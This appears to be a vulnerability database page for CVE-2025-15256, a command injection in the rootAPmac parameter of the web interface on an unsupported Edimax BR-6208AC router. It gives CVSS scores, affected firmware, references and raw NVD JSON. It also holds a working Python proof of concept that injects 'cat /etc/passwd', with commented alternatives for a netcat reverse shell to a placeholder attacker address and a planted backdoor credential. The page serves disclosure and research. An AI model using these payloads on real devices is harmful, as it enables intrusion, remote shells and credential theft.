CVE-2025-15256

Description

A vulnerability was identified in Edimax BR-6208AC 1.02/1.03. Affected is the function formStaDrvSetup of the file /goform/formStaDrvSetup of the component Web-based Configuration Interface. The manipulation of the argument rootAPmac leads to command injection. Remote exploitation of the attack is possible. The exploit is publicly available and might be used. Edimax confirms this issue: "The product mentioned, EDIMAX BR-6208AC V2, has reached its End of Life (EOL) status. It is no longer supported or maintained by Edimax, and it is no longer available for purchase in the market. Consequently, there will be no further firmware updates or patches for this device. We recommend users upgrade to newer models for better security." This vulnerability only affects products that are no longer supported by the maintainer.

CVSS Details

CVSS Score

7.3

Severity

HIGH

CVSS Vector

CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:L/I:L/A:L

Configurations (Affected Products)

cpe:2.3:o:edimax:br-6208ac_firmware:1.02:*:*:*:*:*:*:* - VULNERABLE

cpe:2.3:o:edimax:br-6208ac_firmware:1.03:*:*:*:*:*:*:* - VULNERABLE

cpe:2.3:h:edimax:br-6208ac:2.0:*:*:*:*:*:*:* - NOT VULNERABLE

Edimax BR-6208AC V2 固件 1.02

Edimax BR-6208AC V2 固件 1.03

PoC / Exploit Code

⚠ For Security Research Only

The following code is for security research and authorized testing only.

python

import requests

# CVE-2025-15256 PoC - Edimax BR-6208AC Command Injection
# Target: /goform/formStaDrvSetup
# Parameter: rootAPmac

target_ip = "192.168.1.1"  # Router IP
target_port = 80

# Construct malicious payload with command injection
# Using semicolon to chain commands
malicious_mac = ";cat /etc/passwd;#"

# Alternative payloads:
# Reverse shell: ";nc -e /bin/sh <attacker_ip> <port>#"
# Read config: ";cat /etc/config/network;#"
# Create backdoor: ";echo admin:admin > /tmp/pwd;#"

url = f"http://{target_ip}:{target_port}/goform/formStaDrvSetup"

data = {
    "rootAPmac": malicious_mac,
    "formStaDrvSetupSubmit": "Apply"
}

try:
    response = requests.post(url, data=data, timeout=10)
    print(f"Status Code: {response.status_code}")
    print(f"Response: {response.text[:500]}")
except requests.exceptions.RequestException as e:
    print(f"Request failed: {e}")

References

[1] CVE.org https://www.cve.org/CVERecord?id=CVE-2025-15256
[2] NVD NIST https://nvd.nist.gov/vuln/detail/CVE-2025-15256
[3] CVE Details https://www.cvedetails.com/cve/CVE-2025-15256/
[4] VulDB https://vuldb.com/cve/CVE-2025-15256
[5] https://tzh00203.notion.site/EDIMAX-BR-6208AC-V2_1-02-Command-Injection-Vulnerability-in-Web-formStaDrvSetup-handler-2d2b5c52018a803ebd91c200b3e2925b?source=copy_link
[6] https://vuldb.com/?ctiid.338646
[7] https://vuldb.com/?id.338646
[8] https://vuldb.com/?submit.722014
[9] https://tzh00203.notion.site/EDIMAX-BR-6208AC-V2_1-02-Command-Injection-Vulnerability-in-Web-formStaDrvSetup-handler-2d2b5c52018a803ebd91c200b3e2925b

Raw JSON Data

JSON

{"cve": {"id": "CVE-2025-15256", "sourceIdentifier": "[email protected]", "published": "2025-12-30T17:15:41.027", "lastModified": "2026-04-29T01:00:01.613", "vulnStatus": "Analyzed", "cveTags": [{"sourceIdentifier": "[email protected]", "tags": ["unsupported-when-assigned"]}], "descriptions": [{"lang": "en", "value": "A vulnerability was identified in Edimax BR-6208AC 1.02/1.03. Affected is the function formStaDrvSetup of the file /goform/formStaDrvSetup of the component Web-based Configuration Interface. The manipulation of the argument rootAPmac leads to command injection. Remote exploitation of the attack is possible. The exploit is publicly available and might be used. Edimax confirms this issue: \"The product mentioned, EDIMAX BR-6208AC V2, has reached its End of Life (EOL) status. It is no longer supported or maintained by Edimax, and it is no longer available for purchase in the market. Consequently, there will be no further firmware updates or patches for this device. We recommend users upgrade to newer models for better security.\" This vulnerability only affects products that are no longer supported by the maintainer."}, {"lang": "es", "value": "Se identificó una vulnerabilidad en Edimax BR-6208AC 1.02/1.03. Afectada está la función formStaDrvSetup del archivo /goform/formStaDrvSetup del componente Interfaz de Configuración Basada en Web. La manipulación del argumento rootAPmac conduce a una inyección de comandos. Es posible la explotación remota del ataque. El exploit está disponible públicamente y podría ser utilizado. Edimax confirma este problema: 'El producto mencionado, EDIMAX BR-6208AC V2, ha alcanzado su estado de Fin de Vida Útil (EOL). Ya no es compatible ni mantenido por Edimax, y ya no está disponible para su compra en el mercado. En consecuencia, no habrá más actualizaciones de firmware ni parches para este dispositivo. Recomendamos a los usuarios actualizar a modelos más nuevos para una mejor seguridad.' Esta vulnerabilidad solo afecta a productos que ya no son compatibles con el mantenedor."}], "metrics": {"cvssMetricV40": [{"source": "[email protected]", "type": "Secondary", "cvssData": {"version": "4.0", "vectorString": "CVSS:4.0/AV:N/AC:L/AT:N/PR:N/UI:N/VC:L/VI:L/VA:L/SC:N/SI:N/SA:N/E:P/CR:X/IR:X/AR:X/MAV:X/MAC:X/MAT:X/MPR:X/MUI:X/MVC:X/MVI:X/MVA:X/MSC:X/MSI:X/MSA:X/S:X/AU:X/R:X/V:X/RE:X/U:X", "baseScore": 5.5, "baseSeverity": "MEDIUM", "attackVector": "NETWORK", "attackComplexity": "LOW", "attackRequirements": "NONE", "privilegesRequired": "NONE", "userInteraction": "NONE", "vulnConfidentialityImpact": "LOW", "vulnIntegrityImpact": "LOW", "vulnAvailabilityImpact": "LOW", "subConfidentialityImpact": "NONE", "subIntegrityImpact": "NONE", "subAvailabilityImpact": "NONE", "exploitMaturity": "PROOF_OF_CONCEPT", "confidentialityRequirement": "NOT_DEFINED", "integrityRequirement": "NOT_DEFINED", "availabilityRequirement": "NOT_DEFINED", "modifiedAttackVector": "NOT_DEFINED", "modifiedAttackComplexity": "NOT_DEFINED", "modifiedAttackRequirements": "NOT_DEFINED", "modifiedPrivilegesRequired": "NOT_DEFINED", "modifiedUserInteraction": "NOT_DEFINED", "modifiedVulnConfidentialityImpact": "NOT_DEFINED", "modifiedVulnIntegrityImpact": "NOT_DEFINED", "modifiedVulnAvailabilityImpact": "NOT_DEFINED", "modifiedSubConfidentialityImpact": "NOT_DEFINED", "modifiedSubIntegrityImpact": "NOT_DEFINED", "modifiedSubAvailabilityImpact": "NOT_DEFINED", "Safety": "NOT_DEFINED", "Automatable": "NOT_DEFINED", "Recovery": "NOT_DEFINED", "valueDensity": "NOT_DEFINED", "vulnerabilityResponseEffort": "NOT_DEFINED", "providerUrgency": "NOT_DEFINED"}}], "cvssMetricV31": [{"source": "[email protected]", "type": "Secondary", "cvssData": {"version": "3.1", "vectorString": "CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:L/I:L/A:L", "baseScore": 7.3, "baseSeverity": "HIGH", "attackVector": "NETWORK", "attackComplexity": "LOW", "privilegesRequired": "NONE", "userInteraction": "NONE", "scope": "UNCHANGED", "confidentialityImpact": "LOW", "integrityImpact": "LOW", "availabilityImpact": "LOW"}, "exploitabilityScore": 3.9, "impactScore": 3.4}, {"source": "[email protected]", "type": "Primary", "cvssData": {"version": "3.1", "vectorString": "CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:H/I:H/A:H", "baseScore": 9.8, "baseSeverity": "CRITICAL", "attackVector": "NETWORK", "attackComplexity": "LOW", "privilegesRequired": "NONE", "userInteraction": "NONE", "scope": "UNCHANGED", "confidentialityImpact": "HIGH", "integrityImpact": "HIGH", "availabilityImpact": "HIGH"}, "exploitabilityScore": 3.9, "impactScore": 5.9}], "cvssMetricV2": [{"source": "[email protected]", "type": "Secondary", "cvssData": {"version": "2.0", "vectorString": "AV:N/AC:L/Au:N/C:P/I:P/A:P", "baseScore": 7.5, "accessVector": "NETWORK", "accessComplexity": "LOW", "authentication": "NONE", "confidentialityImpact": "PARTIAL", "integrityImpact": "PARTIAL", "availabilityImpact": "PARTIAL"}, "baseSeverity": "HIGH", "exploitabilityScore": 10.0, "impactScore": 6.4, "acInsufInfo": false, "obtainAllPrivilege": false, ... (truncated)